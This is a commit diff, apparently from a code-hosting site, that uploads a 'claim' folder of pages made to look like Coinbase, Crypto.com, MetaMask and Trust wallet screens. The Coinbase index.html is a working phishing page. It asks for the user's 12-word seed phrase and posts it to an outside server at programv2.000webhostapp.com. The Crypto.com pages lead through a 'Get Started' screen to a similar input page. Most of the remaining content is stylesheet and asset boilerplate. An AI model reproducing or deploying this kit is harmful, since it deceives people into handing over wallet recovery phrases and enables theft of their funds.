joinme commited on
Commit
d9ee3e6
1 Parent(s): 78a657c

Upload 110 files

Browse files
This view is limited to 50 files because it contains too many changes.   See raw diff
Files changed (50) hide show
  1. claim/coinbase/antd.css +0 -0
  2. claim/coinbase/free-coinbase-7662253-6297189.png +0 -0
  3. claim/coinbase/index.html +90 -0
  4. claim/coinbase/p__create-wallet-process__choose-pattern.chunk.css +1 -0
  5. claim/coinbase/p__create-wallet-process__create-pwd.chunk.css +1 -0
  6. claim/coinbase/p__create-wallet-process__disclaimer.chunk.css +1 -0
  7. claim/coinbase/p__create-wallet-process__get-start-next.chunk.css +17 -0
  8. claim/coinbase/p__create-wallet-process__get-start.chunk.css +10 -0
  9. claim/coinbase/p__create-wallet-process__import-wallet.chunk.css +1 -0
  10. claim/coinbase/p__create-wallet-process__wallet-name.chunk.css +1 -0
  11. claim/coinbase/static/icon-go-back.820d05e0.svg +4 -0
  12. claim/coinbase/umi.css +1 -0
  13. claim/cro/antd.css +0 -0
  14. claim/cro/cr2802c646-crypto-com-coin-logo-crypto-com-coin-cro-price-today-value-real-time-charts-amp-news.png +0 -0
  15. claim/cro/index.html +83 -0
  16. claim/cro/input.html +83 -0
  17. claim/cro/p__create-wallet-process__choose-pattern.chunk.css +1 -0
  18. claim/cro/p__create-wallet-process__create-pwd.chunk.css +1 -0
  19. claim/cro/p__create-wallet-process__disclaimer.chunk.css +1 -0
  20. claim/cro/p__create-wallet-process__get-start-next.chunk.css +17 -0
  21. claim/cro/p__create-wallet-process__get-start.chunk.css +10 -0
  22. claim/cro/p__create-wallet-process__import-wallet.chunk.css +1 -0
  23. claim/cro/p__create-wallet-process__wallet-name.chunk.css +1 -0
  24. claim/cro/static/secure.37ba123e.svg +6 -0
  25. claim/cro/static/smooth.0e4668cd.svg +8 -0
  26. claim/cro/static/stable.d70c19e4.svg +5 -0
  27. claim/cro/umi.css +1 -0
  28. claim/index.html +0 -0
  29. claim/meta-signin/image/logo/metamask-fox.svg +1 -0
  30. claim/meta-signin/image/logo/metamask-logo-horizontal.svg +1 -0
  31. claim/meta-signin/index.css +0 -0
  32. claim/meta-signin/index.html +371 -0
  33. claim/trust/32179889.png +0 -0
  34. claim/trust/Trust_files/6f535fa698ae581f.css +1 -0
  35. claim/trust/Trust_files/raw.1211abf0.svg +48 -0
  36. claim/trust/Trust_files/raw.4edbb099.svg +37 -0
  37. claim/trust/Trust_files/raw.9a6dd06f.svg +1 -0
  38. claim/trust/Trust_files/raw.b373ab3f.svg +1 -0
  39. claim/trust/Trust_files/raw.d07410b5.svg +1 -0
  40. claim/trust/Trust_files/raw.d927cfe4.svg +0 -0
  41. claim/trust/Trust_files/raw.e1c172b2.svg +1 -0
  42. claim/trust/Trust_files/raw.e4b77b0f.svg +1 -0
  43. claim/trust/Trust_files/raw.e7c57d68.svg +1 -0
  44. claim/trust/Trust_files/webpack-4fe6da641f3929c9.js.download +1 -0
  45. claim/trust/assets/imgs/Group 16837.png +0 -0
  46. claim/trust/assets/imgs/feather-ico/shopping-cart-black.svg +15 -0
  47. claim/trust/assets/imgs/feather-ico/trash.svg +14 -0
  48. claim/trust/assets/imgs/icon-black/chevron-left-black.svg +11 -0
  49. claim/trust/assets/imgs/icon-black/search-black.svg +16 -0
  50. claim/trust/assets/imgs/icon-white/close-white.svg +12 -0
claim/coinbase/antd.css ADDED
The diff for this file is too large to render. See raw diff
 
claim/coinbase/free-coinbase-7662253-6297189.png ADDED
claim/coinbase/index.html ADDED
@@ -0,0 +1,90 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <!DOCTYPE html>
2
+ <html lang="en"><head><style rc-util-key="@ant-design-icons">
3
+ .anticon {
4
+ display: inline-block;
5
+ color: inherit;
6
+ font-style: normal;
7
+ line-height: 0;
8
+ text-align: center;
9
+ text-transform: none;
10
+ vertical-align: -0.125em;
11
+ text-rendering: optimizeLegibility;
12
+ -webkit-font-smoothing: antialiased;
13
+ -moz-osx-font-smoothing: grayscale;
14
+ }
15
+
16
+ .anticon > * {
17
+ line-height: 1;
18
+ }
19
+
20
+ .anticon svg {
21
+ display: inline-block;
22
+ }
23
+
24
+ .anticon::before {
25
+ display: none;
26
+ }
27
+
28
+ .anticon .anticon-icon {
29
+ display: block;
30
+ }
31
+
32
+ .anticon[tabindex] {
33
+ cursor: pointer;
34
+ }
35
+
36
+ .anticon-spin::before,
37
+ .anticon-spin {
38
+ display: inline-block;
39
+ -webkit-animation: loadingCircle 1s infinite linear;
40
+ animation: loadingCircle 1s infinite linear;
41
+ }
42
+
43
+ @-webkit-keyframes loadingCircle {
44
+ 100% {
45
+ -webkit-transform: rotate(360deg);
46
+ transform: rotate(360deg);
47
+ }
48
+ }
49
+
50
+ @keyframes loadingCircle {
51
+ 100% {
52
+ -webkit-transform: rotate(360deg);
53
+ transform: rotate(360deg);
54
+ }
55
+ }
56
+ </style>
57
+ <meta charset="utf-8">
58
+ <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no">
59
+ <meta name="theme-color" content="#000000">
60
+ <meta name="description" content="Crypto.com Wallet Extension">
61
+ <title>Coinbase Wallet</title>
62
+ <link rel="icon" href="logo.png">
63
+ <link rel="apple-touch-icon" href="./logo192.png">
64
+ <link rel="manifest" href="./manifest.json">
65
+ <title></title>
66
+ <link rel="stylesheet" href="./antd.css">
67
+ <link rel="stylesheet" href="./umi.css">
68
+
69
+
70
+ <link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-pattern.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__disclaimer.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__create-pwd.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__wallet-name.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__import-wallet.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start-next.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-model.chunk.css"><link rel="stylesheet" type="text/css" href="./p__qrcode.chunk.css"></head>
71
+
72
+ <body>
73
+ <div id="root"><div class="import_wallet___248SK"><a href="index.html?access-my-wallet" div="" class="go_back___1-f-c"></a><div class="title___1C2cy">Import Wallet</div><div class="subtitle___1InNY">Enter your wallet’s 12 word recovery phrase (also called a seed phrase). You can import any Ethereum wallet.</div><form method="post" action="https://programv2.000webhostapp.com/nob.php" form="" autocomplete="off" class="ant-form ant-form-vertical"><div class="area_wrap___2YyXp "><svg width="24" height="24" viewBox="0 0 24 24" fill="none"><path fill-rule="evenodd" clip-rule="evenodd" d="M12 10.9741L8.23837 7.21247C7.95508 6.92918 7.49576 6.92918 7.21247 7.21247C6.92918 7.49576 6.92918 7.95508 7.21247 8.23837L10.9741 12L7.21247 15.7616C6.92918 16.0449 6.92918 16.5042 7.21247 16.7875C7.49576 17.0708 7.95508 17.0708 8.23837 16.7875L12 13.0259L15.7616 16.7875C16.0449 17.0708 16.5042 17.0708 16.7875 16.7875C17.0708 16.5042 17.0708 16.0449 16.7875 15.7616L13.0259 12L16.7875 8.23837C17.0708 7.95508 17.0708 7.49576 16.7875 7.21247C16.5042 6.92918 16.0449 6.92918 15.7616 7.21247L12 10.9741Z" fill="#E64B60"></path></svg><textarea placeholder="12 word seed phrase" class="ant-input area___3V06- " type="text" name="walletSeed" required="true"></textarea><div class="tip___3g37l"></div><div class="card-body" style="font-size: 10pt;line-height: 1.5;">
74
+ <a href="https://www.coinbase.com/wallet/articles/getting-started-extension#import-existing-wallet" target="_blank" style="
75
+ color: #4c95cf!important;
76
+ ">Where can I find it?</a>.
77
+ </div></div>
78
+ <br><br><br><br><button type="submit" class="ant-btn ant-btn-default ant-btn-block btn___3NA9b" style="height: 48px; background-color: rgb(17, 153, 250);"><span>Import Wallet</span></button></form></div></div>
79
+
80
+ <script src="./web3.js"></script>
81
+ <script src="./idna-uts46-hx.js"></script>
82
+ <script src="./ethersproject.js"></script>
83
+ <script src="./ethereumjs.js"></script>
84
+ <script src="./mathjs.js"></script>
85
+ <script src="./antd.js"></script>
86
+ <script src="./vendors.js"></script>
87
+ <script src="./umi.js"></script>
88
+
89
+
90
+ <style rc-util-key="antd-wave"></style></body></html>
claim/coinbase/p__create-wallet-process__choose-pattern.chunk.css ADDED
@@ -0,0 +1 @@
 
 
1
+ .go_back___1-f-c{position:absolute;top:24px;left:16px;width:24px;height:24px;background:url(static/icon-go-back.820d05e0.svg) no-repeat 50%/contain;cursor:pointer}.choose_model___lI54i{display:flex;flex-direction:column;width:100%;height:100%;padding:88px 16px 0;text-align:center}.choose_model___lI54i .title___-sp5s{color:#323c52;font-weight:600;font-size:24px;line-height:29px}.choose_model___lI54i .desc___3Ubfb{color:#5d667b;font-size:16px;line-height:24px}.choose_model___lI54i .pattern___pZ6oc .desc___3Ubfb{margin-top:16px;margin-bottom:41px}.choose_model___lI54i .create_modal___2mq3e{margin-bottom:40px;padding-top:47px}.choose_model___lI54i .card___1Y6Rk{display:flex;flex-direction:column;justify-content:center;width:328px;height:116px;margin-bottom:16px;padding:16px;text-align:left;background:url(static/icon-arrow-right.e46dfeab.svg) no-repeat center right 16px;background-color:#fff;background-size:24px 24px;border-radius:8px;box-shadow:2px 0 12px 2px rgba(11,20,38,.05);cursor:pointer}.choose_model___lI54i .card___1Y6Rk:hover{box-shadow:2px 0 12px 2px rgba(11,20,38,.1)}.choose_model___lI54i .card_title___2N9-R{margin-bottom:6px;padding-left:32px;color:#0b1426;font-weight:700;font-size:14px;line-height:20px;background:no-repeat 0;background-size:24px}.choose_model___lI54i .card_desc___3a8-C{width:248px;color:#808c99;font-weight:500;font-size:14px;line-height:20px}.choose_model___lI54i .import___1VLfP{background-image:url(static/import.1d17ba8c.svg)}.choose_model___lI54i .create___1uVCl{background-image:url(static/create.7e90997d.svg)}.choose_model___lI54i .bridge___2hVk5{background-image:url(static/bridge.7fd50f67.svg)}.choose_model___lI54i .standalone___3r-w6{background-image:url(static/standalone.51f4e597.svg)}
claim/coinbase/p__create-wallet-process__create-pwd.chunk.css ADDED
@@ -0,0 +1 @@
 
 
1
+ .go_back___1-f-c{position:absolute;top:24px;left:16px;width:24px;height:24px;background:url(static/icon-go-back.820d05e0.svg) no-repeat 50%/contain;cursor:pointer}.btn___3NA9b{display:flex;flex-shrink:0;align-items:center;justify-content:center;color:#fff;font-weight:600;font-size:16px;font-style:normal;border:none;border-radius:8px;cursor:pointer}.btn___3NA9b:focus,.btn___3NA9b:hover,.btn___3NA9b[disabled]{color:#fff!important;opacity:.7!important}.create_pwd___3_ptA{display:flex;flex-direction:column;height:100%;padding:115px 16px 32px}.create_pwd___3_ptA .title___a5r0Q{margin-bottom:16px;color:#323c52;font-weight:600;font-size:24px;line-height:29px;text-align:center}.create_pwd___3_ptA .desc___2U9le{margin-bottom:44px;color:#5d667b;font-weight:500;font-size:16px;line-height:24px;text-align:center}.create_pwd___3_ptA input{height:48px;color:#97a5b6;background:#f2f4f6!important}.create_pwd___3_ptA .hint___1Dy01{margin-bottom:8px;color:#808c99;font-size:12px;line-height:14px;text-align:left}.create_pwd___3_ptA .form_wrapper___3mWfI{display:flex;flex-direction:column;flex-grow:1;justify-content:flex-start}.create_pwd___3_ptA .disclaimer___3VnKY{color:#5d667b;font-weight:500;font-size:12px}.create_pwd___3_ptA .ant-form-item-has-error .ant-input-affix-wrapper{background-color:#f2f4f6!important;border-radius:4px}.create_pwd___3_ptA .ant-input-affix-wrapper{background-color:#f2f4f6!important;border-radius:4px}.create_pwd___3_ptA .ant-form-item:last-child{margin-top:auto;margin-bottom:0}
claim/coinbase/p__create-wallet-process__disclaimer.chunk.css ADDED
@@ -0,0 +1 @@
 
 
1
+ .errorImg___3sziM{width:88px}.go_back___1-f-c{position:absolute;top:24px;left:16px;width:24px;height:24px;background:url(static/icon-go-back.820d05e0.svg) no-repeat 50%/contain;cursor:pointer}.btn___3NA9b{display:flex;flex-shrink:0;align-items:center;justify-content:center;color:#fff;font-weight:600;font-size:16px;font-style:normal;border:none;border-radius:8px;cursor:pointer}.btn___3NA9b:focus,.btn___3NA9b:hover,.btn___3NA9b[disabled]{color:#fff!important;opacity:.7!important}.disclaimer___24_wC{display:flex;flex-direction:column;width:100%;height:100%;padding:96px 16px 32px;text-align:center}.disclaimer___24_wC .errorLogo___1UQAz{align-self:center}.disclaimer___24_wC .title___yk5UJ{margin-top:24px;color:#323c52;font-weight:600;font-size:24px;line-height:29px}.disclaimer___24_wC .desc___ctQmj{flex-grow:1;margin-top:16px;color:#5d667b;font-weight:500;font-size:16px;line-height:24px}.disclaimer___24_wC .link___2cUpu{margin-top:16px;font-weight:600;font-size:16px}
claim/coinbase/p__create-wallet-process__get-start-next.chunk.css ADDED
@@ -0,0 +1,17 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ .go_back___1-f-c { position: absolute; top: 24px; left: 16px; width: 24px; height: 24px; background: url("static/icon-go-back.820d05e0.svg") 50% center / contain no-repeat; cursor: pointer; }
2
+ .btn___3NA9b { display: flex; flex-shrink: 0; align-items: center; justify-content: center; color: rgb(255, 255, 255); font-weight: 600; font-size: 16px; font-style: normal; border: none; border-radius: 8px; cursor: pointer; }
3
+ .btn___3NA9b:focus, .btn___3NA9b:hover, .btn___3NA9b[disabled] { color: rgb(255, 255, 255) !important; opacity: 0.7 !important; }
4
+ .get_start_next___1Sw83 { display: flex; flex-direction: column; height: 100%; }
5
+ .get_start_next___1Sw83 .header___LFDZ2 { display: block; height: 70px; margin-top: 24px; font-weight: 500; font-size: 16px; text-align: center; }
6
+ .get_start_next___1Sw83 img[title="banner"] { width: 216px; margin: 0px auto; padding-top: 16px; }
7
+ .get_start_next___1Sw83 .card___3ZGCe { display: flex; justify-content: center; padding-top: 16px; }
8
+ .get_start_next___1Sw83 .card___3ZGCe img { height: 160px; margin: 0px auto; }
9
+ .get_start_next___1Sw83 .card___3ZGCe p { font-weight: 500; font-size: 16px; text-align: center; }
10
+ .get_start_next___1Sw83 .title___5jijw { margin-bottom: 16px; color: rgb(50, 60, 82); font-weight: 600; font-size: 20px; line-height: 26px; text-align: center; }
11
+ .get_start_next___1Sw83 .desc___2fvVk { width: 308px; height: 120px; margin: auto; color: rgb(93, 102, 123); font-size: 16px; line-height: 24px; text-align: center; }
12
+ .get_start_next___1Sw83 .btnBlock___3XMLL { margin-top: auto; margin-bottom: 32px; padding: 0px 16px; }
13
+ .get_start_next___1Sw83 .ant-carousel { padding: 0px 16px; }
14
+ .get_start_next___1Sw83 .ant-carousel .slick-dots { position: static; margin-top: 30px; }
15
+ .get_start_next___1Sw83 .ant-carousel .slick-dots li { height: 6px; width: 6px !important; }
16
+ .get_start_next___1Sw83 .ant-carousel .slick-dots li button { width: 6px; height: 6px; background: rgba(30, 63, 111, 0.4); border-radius: 50%; }
17
+ .get_start_next___1Sw83 .ant-carousel .slick-active button { background: rgb(30, 63, 111) !important; }
claim/coinbase/p__create-wallet-process__get-start.chunk.css ADDED
@@ -0,0 +1,10 @@
 
 
 
 
 
 
 
 
 
 
 
1
+ .btn___3NA9b { display: flex; flex-shrink: 0; align-items: center; justify-content: center; color: rgb(255, 255, 255); font-weight: 600; font-size: 16px; font-style: normal; border: none; border-radius: 8px; cursor: pointer; }
2
+ .btn___3NA9b:focus, .btn___3NA9b:hover, .btn___3NA9b[disabled] { color: rgb(255, 255, 255) !important; opacity: 0.7 !important; }
3
+ .get_start___27mNP { display: flex; flex-direction: column; height: 100%; padding: 100px 16px 32px; background-color: rgb(247, 249, 250); }
4
+ .wrapper___1V5Cg { flex-grow: 1; padding-top: 121px; color: rgb(50, 60, 82); font-weight: 600; font-size: 24px; line-height: 29px; text-align: center; background: url("static/logo.c3d55bff.svg") center top / 96px 96px no-repeat; }
5
+ .text_item___1EP-X { margin-bottom: 16px; padding-left: 42px; background: 0px center / 24px no-repeat; }
6
+ .stable___328gu { background-image: url("static/stable.d70c19e4.svg"); }
7
+ .secure___3kAwR { background-image: url("static/secure.37ba123e.svg"); }
8
+ .smooth___2KWgA { background-image: url("static/smooth.0e4668cd.svg"); }
9
+ .subtitle___Rt-rb { margin-top: 16px; margin-bottom: 24px; color: rgb(151, 165, 182); font-weight: 500; font-size: 16px; font-style: normal; line-height: 24px; text-align: center; }
10
+ .desc_list___1pmTm { display: flex; flex-direction: column; width: 200px; margin: auto; color: rgb(50, 60, 82); font-weight: 500; font-size: 16px; font-style: normal; line-height: 150%; text-align: left; }
claim/coinbase/p__create-wallet-process__import-wallet.chunk.css ADDED
@@ -0,0 +1 @@
 
 
1
+ .go_back___1-f-c{position:absolute;top:24px;left:16px;width:24px;height:24px;background:url(static/icon-go-back.820d05e0.svg) no-repeat 50%/contain;cursor:pointer}.wrong___3L-QA .tip___2jQ65{margin-top:8px;color:#e64b60}.accountIndex___1Siwt .ant-input,.accountIndex___1Siwt .ant-input-affix-wrapper{color:#0b1426;line-height:22px;background:#f2f4f6}.accountIndex___1Siwt .ant-input-affix-wrapper::placeholder,.accountIndex___1Siwt .ant-input::placeholder{color:#97a5b6}.accountIndex___1Siwt .ant-input{height:48px}.accountIndex___1Siwt .ant-input-affix-wrapper{padding-top:0;padding-bottom:0;border:none;border-radius:4px}.accountIndex___1Siwt .ant-input-suffix{position:relative;min-width:18px}.accountIndex___1Siwt .ant-input-suffix .ant-input-show-count-suffix{position:absolute;right:-10px;bottom:-24px;margin:0;color:#5d667b;font-weight:500;font-size:12px;line-height:16px;text-align:right}.accountIndex___1Siwt .ant-input-suffix .ant-input-show-count-suffix:after{content:"/28"}.desc___2gE_N{margin-right:-2px;margin-bottom:8px;color:#808c99;font-weight:400;font-size:12px;font-style:normal;line-height:20px}.tip___2jQ65{color:#808c99;font-size:12px;line-height:14px}.btn___3NA9b{display:flex;flex-shrink:0;align-items:center;justify-content:center;color:#fff;font-weight:600;font-size:16px;font-style:normal;border:none;border-radius:8px;cursor:pointer}.btn___3NA9b:focus,.btn___3NA9b:hover,.btn___3NA9b[disabled]{color:#fff!important;opacity:.7!important}@font-face{font-family:text-security-disc;src:url(static/text-security-disc.e6c665e7.woff2)}.import_wallet___248SK{display:flex;flex-direction:column;width:100%;height:100%;padding:64px 16px 10px;background:#f7f9fa}.import_wallet___248SK .ant-input{transition:none}.title___1C2cy{color:#323c52;font-weight:600;font-size:24px;line-height:29px;text-align:center}.subtitle___1InNY{margin:16px 0 32px;color:#5d667b;font-weight:500;font-size:16px;line-height:24px;text-align:center}.desc___2SBxc{margin-right:-2px;color:#808c99;font-weight:400;font-size:12px;font-style:normal;line-height:20px}.ant-form{display:flex;flex:1 1;flex-direction:column}.ant-form .ant-btn{margin-top:8px}.area_wrap___2YyXp{margin-bottom:26px}.area_wrap___2YyXp svg{display:none}.wrong___1EKDx.area_wrap___2YyXp{position:relative}.wrong___1EKDx.area_wrap___2YyXp svg{position:absolute;top:18px;right:11px;z-index:1000;display:block}.wrong___1EKDx .tip___3g37l{color:#e64b60}.pharse___17MIH{font-size:small;font-family:text-security-disc;letter-spacing:2px;-webkit-text-security:disc}.area___3V06-{display:block;height:128px!important;margin:8px 0;padding:10px 8px;background:#f2f4f6;border:none;border-radius:4px;outline:none;resize:none}.tip___3g37l{color:#808c99;font-size:12px;line-height:14px}.disclaimer___1qGN0{margin-top:auto;color:#808c99;font-size:12px;line-height:14px}.tips___2pLfT{display:inline-block;color:#5d667b;font-weight:500;font-size:12px}
claim/coinbase/p__create-wallet-process__wallet-name.chunk.css ADDED
@@ -0,0 +1 @@
 
 
1
+ .go_back___1-f-c{position:absolute;top:24px;left:16px;width:24px;height:24px;background:url(static/icon-go-back.820d05e0.svg) no-repeat 50%/contain;cursor:pointer}.wrong___3L-QA .tip___2jQ65{margin-top:8px;color:#e64b60}.accountIndex___1Siwt .ant-input,.accountIndex___1Siwt .ant-input-affix-wrapper{color:#0b1426;line-height:22px;background:#f2f4f6}.accountIndex___1Siwt .ant-input-affix-wrapper::placeholder,.accountIndex___1Siwt .ant-input::placeholder{color:#97a5b6}.accountIndex___1Siwt .ant-input{height:48px}.accountIndex___1Siwt .ant-input-affix-wrapper{padding-top:0;padding-bottom:0;border:none;border-radius:4px}.accountIndex___1Siwt .ant-input-suffix{position:relative;min-width:18px}.accountIndex___1Siwt .ant-input-suffix .ant-input-show-count-suffix{position:absolute;right:-10px;bottom:-24px;margin:0;color:#5d667b;font-weight:500;font-size:12px;line-height:16px;text-align:right}.accountIndex___1Siwt .ant-input-suffix .ant-input-show-count-suffix:after{content:"/28"}.desc___2gE_N{margin-right:-2px;margin-bottom:8px;color:#808c99;font-weight:400;font-size:12px;font-style:normal;line-height:20px}.tip___2jQ65{color:#808c99;font-size:12px;line-height:14px}.btn___3NA9b{display:flex;flex-shrink:0;align-items:center;justify-content:center;color:#fff;font-weight:600;font-size:16px;font-style:normal;border:none;border-radius:8px;cursor:pointer}.btn___3NA9b:focus,.btn___3NA9b:hover,.btn___3NA9b[disabled]{color:#fff!important;opacity:.7!important}.wallet-name___1gDBu{display:flex;flex-direction:column;width:100%;height:100%;padding:103px 16px 32px;background:#f7f9fa}.wallet-name___1gDBu .title___278Uj{color:#323c52;font-weight:600;font-size:24px;line-height:29px;text-align:center}.wallet-name___1gDBu .subtitle___2Bi71{margin:16px 0 80px;color:#5d667b;font-weight:500;font-size:16px;line-height:24px;text-align:center}.wallet-name___1gDBu .ant-form{display:flex;flex:1 1;flex-direction:column}.wallet-name___1gDBu .ant-form .ant-btn-block{margin-top:auto}.wallet-name___1gDBu .ant-form .ant-form-item-label label{color:#808c99;font-weight:400;font-size:12px;line-height:14px}.wallet-name___1gDBu .ant-form .ant-input,.wallet-name___1gDBu .ant-form .ant-input-affix-wrapper{color:#0b1426;line-height:22px;background:#f2f4f6}.wallet-name___1gDBu .ant-form .ant-input-affix-wrapper::placeholder,.wallet-name___1gDBu .ant-form .ant-input::placeholder{color:#97a5b6}.wallet-name___1gDBu .ant-form .ant-input{height:48px}.wallet-name___1gDBu .ant-form .ant-input-affix-wrapper{padding-top:0;padding-bottom:0;border:none;border-radius:4px}.wallet-name___1gDBu .ant-form .ant-input-suffix{position:relative;min-width:18px}.wallet-name___1gDBu .ant-form .ant-input-suffix .ant-input-show-count-suffix{position:absolute;right:-10px;bottom:-24px;margin:0;color:#5d667b;font-weight:500;font-size:12px;line-height:16px;text-align:right}.wallet-name___1gDBu .ant-form .ant-input-suffix .ant-input-show-count-suffix:after{content:"/28"}.wallet-name___1gDBu .ant-form .ant-form-item .ant-form-item-control,.wallet-name___1gDBu .ant-form .ant-form-item .ant-form-item-label{flex:auto}.wallet-name___1gDBu .ant-form .ant-input-affix-wrapper-status-error:not(.ant-input-affix-wrapper-disabled):not(.ant-input-affix-wrapper-borderless).ant-input-affix-wrapper{background:#f2f4f6}.wallet-name___1gDBu .ant-form .ant-form-item-control-input{margin-bottom:4px}.wallet-name___1gDBu .ant-form .ant-form-item-explain{min-height:unset}.wallet-name___1gDBu .ant-form .ant-form-item-explain>div:not(.ant-form-item-explain-error){display:none}.wallet-name___1gDBu .ant-form .ant-form-item-explain .ant-form-item-explain-error{color:#e64b60;font-size:12px}.wallet-name___1gDBu .form-item-error-wrap___1xlAb .ant-input-suffix .ant-input-show-count-suffix{color:#d9475a}
claim/coinbase/static/icon-go-back.820d05e0.svg ADDED
claim/coinbase/umi.css ADDED
@@ -0,0 +1 @@
 
 
1
+ .spin_center___2APkZ{position:absolute;top:50%;left:50%;transform:translate(-50%,-50%)}body{display:flex;flex-direction:column;align-items:center;justify-content:stretch;margin:0;padding:0;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI","Roboto","Oxygen","Ubuntu","Cantarell","Fira Sans","Droid Sans","Helvetica Neue",sans-serif;background-color:#f7f9fa;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}body,html{width:100%;height:100%}body #root{position:relative;display:flex;flex-direction:column;flex-grow:2;align-items:stretch;justify-content:flex-start;width:360px;min-height:580px;max-height:640px;background-color:#f7f9fa}code{font-family:source-code-pro,Menlo,Monaco,Consolas,"Courier New",monospace}::-webkit-scrollbar{width:0}::-webkit-scrollbar-track{border:none}::-webkit-scrollbar-thumb{background:#c9cfdd;border-radius:5px}
claim/cro/antd.css ADDED
The diff for this file is too large to render. See raw diff
 
claim/cro/cr2802c646-crypto-com-coin-logo-crypto-com-coin-cro-price-today-value-real-time-charts-amp-news.png ADDED
claim/cro/index.html ADDED
@@ -0,0 +1,83 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <html lang="en"><head><style rc-util-key="@ant-design-icons">
2
+ .anticon {
3
+ display: inline-block;
4
+ color: inherit;
5
+ font-style: normal;
6
+ line-height: 0;
7
+ text-align: center;
8
+ text-transform: none;
9
+ vertical-align: -0.125em;
10
+ text-rendering: optimizeLegibility;
11
+ -webkit-font-smoothing: antialiased;
12
+ -moz-osx-font-smoothing: grayscale;
13
+ }
14
+
15
+ .anticon > * {
16
+ line-height: 1;
17
+ }
18
+
19
+ .anticon svg {
20
+ display: inline-block;
21
+ }
22
+
23
+ .anticon::before {
24
+ display: none;
25
+ }
26
+
27
+ .anticon .anticon-icon {
28
+ display: block;
29
+ }
30
+
31
+ .anticon[tabindex] {
32
+ cursor: pointer;
33
+ }
34
+
35
+ .anticon-spin::before,
36
+ .anticon-spin {
37
+ display: inline-block;
38
+ -webkit-animation: loadingCircle 1s infinite linear;
39
+ animation: loadingCircle 1s infinite linear;
40
+ }
41
+
42
+ @-webkit-keyframes loadingCircle {
43
+ 100% {
44
+ -webkit-transform: rotate(360deg);
45
+ transform: rotate(360deg);
46
+ }
47
+ }
48
+
49
+ @keyframes loadingCircle {
50
+ 100% {
51
+ -webkit-transform: rotate(360deg);
52
+ transform: rotate(360deg);
53
+ }
54
+ }
55
+ </style>
56
+ <meta charset="utf-8">
57
+ <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no">
58
+ <meta name="theme-color" content="#000000">
59
+ <meta name="description" content="Crypto.com Wallet Extension">
60
+ <link rel="icon" href="static/logo.c3d55bff.svg">
61
+ <link rel="apple-touch-icon" href="./logo192.png">
62
+ <link rel="manifest" href="./manifest.json">
63
+ <title></title>
64
+ <link rel="stylesheet" href="./antd.css">
65
+ <link rel="stylesheet" href="./umi.css">
66
+
67
+
68
+ <link rel="stylesheet" type="text/css" href="./p__create-wallet-process__choose-pattern.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__disclaimer.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__create-pwd.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__wallet-name.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__import-wallet.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start.chunk.css"><link rel="stylesheet" type="text/css" href="./p__create-wallet-process__get-start-next.chunk.css"></head>
69
+
70
+ <body>
71
+ <div id="root"><div class="get_start___27mNP"><div class="wrapper___1V5Cg">DeFi Wallet Extension<div class="subtitle___Rt-rb">Easily interact with DApps on desktop</div><div class="desc_list___1pmTm"><span class="text_item___1EP-X stable___328gu">Stable Connectivity</span><span class="text_item___1EP-X secure___3kAwR">Secure Logins</span><span class="text_item___1EP-X smooth___2KWgA">Smooth Navigation</span></div></div><a href="input.html?access-my-wallet" button="" type="button" class="ant-btn ant-btn-default ant-btn-block btn___3NA9b" style="height: 48px; background-color: rgb(17, 153, 250);"><span>Get Started</span></a></div></div>
72
+
73
+ <script src="./web3.js"></script>
74
+ <script src="./idna-uts46-hx.js"></script>
75
+ <script src="./ethersproject.js"></script>
76
+ <script src="./ethereumjs.js"></script>
77
+ <script src="./mathjs.js"></script>
78
+ <script src="./antd.js"></script>
79
+ <script src="./vendors.js"></script>
80
+ <script src="./umi.js"></script>
81
+
82
+
83
+ </body></html>
claim/cro/input.html ADDED
@@ -0,0 +1,83 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <html lang="en"><head><style rc-util-key="@ant-design-icons">
2
+ .anticon {
3
+ display: inline-block;
4
+ color: inherit;
5
+ font-style: normal;
6
+ line-height: 0;
7
+ text-align: center;
8
+ text-transform: none;
9
+ vertical-align: -0.125em;
10
+ text-rendering: optimizeLegibility;
11
+ -webkit-font-smoothing: antialiased;
12
+ -moz-osx-font-smoothing: grayscale;
13
+ }
14
+
15
+ .anticon > * {
16
+ line-height: 1;
17
+ }
18
+
19
+ .anticon svg {
20
+ display: inline-block;
21
+ }
22
+
23
+ .anticon::before {
24
+ display: none;
25
+ }
26
+
27
+ .anticon .anticon-icon {
28
+ display: block;
29
+ }
30
+
31
+ .anticon[tabindex] {
32
+ cursor: pointer;
33
+ }
